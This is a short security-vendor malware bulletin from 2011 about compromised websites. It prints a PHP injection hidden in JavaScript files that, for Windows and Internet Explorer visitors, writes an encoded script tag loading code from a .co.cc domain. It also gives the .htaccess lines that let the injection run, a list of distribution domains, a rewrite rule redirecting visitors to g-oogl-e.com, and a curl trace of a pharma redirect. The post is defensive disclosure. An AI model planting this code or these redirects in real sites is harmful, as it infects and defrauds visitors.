Weekly malware update – 2010/Jan/31

  • February 1, 2011

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

.co.cc malicious entries

We reported those issues a while ago (here and here), but we are still seeing a large number of sites infected. The following code is added to a javascript file:

<?php $de=”HTTP_USER_AGENT“;$ar=$_SERVER[$de];if(stristr($ar,”MSIE“)&&stristr($ar,”Windows“))echo “Document.write(unescape(“%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%77%64%64%2E%63%6F%2E%63%63%2F%34%31%22%3E%3C%2F%73%63%72%69%..74%3E`));”

With an .htaccess modification to make such code work:

AddHandler php5-script .js
AddType application/x-httpd-php .js

The domains being used to distribute the malware change every few days and those are the ones we identified so far:

google-analytisc.co.cc
js-o-kcjh.cz.cc
oiihgw.co.cc
oiwdd.co.cc
pojdue.co.cc

Note that due to the nature of this malware, it will only infected users using Windows + IE and the site will not get blacklisted.

g-oogl-e.com and .htaccess redirection

Seeing a few sites with the following .htaccess added to all sub-folders, to redirect users to malware/spam/etc:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://g-oogl-e.com/%{REMOTE_ADDR}

goodle-search.com and pharma redirection

Another one that we are tracking and seeing many infected sites. The attackers added a malicious code to redirect any visitor coming from a search engine (referer equals to google.com) to a site displaying pharmacy   products.

This is what the redirection looks like:

$ curl -D – -A “Windows MSIE” –referer “http://www.google.com/” infectedsite.com
HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 18:28:47 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.13
Location: http://goodle-search.com/in.cgi?19&seoref=http%253A%252F%252Fwww.google.com..

Which then redirects to http://onlinechemist24.org/medicine-products-bestsellers-en.html and other sites..

To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
1 comment
  1. Pingback: Tweets that mention Weekly malware update – 2010/Jan/31 | Sucuri -- Topsy.com

Comments are closed.

Related Categories
You May Also Like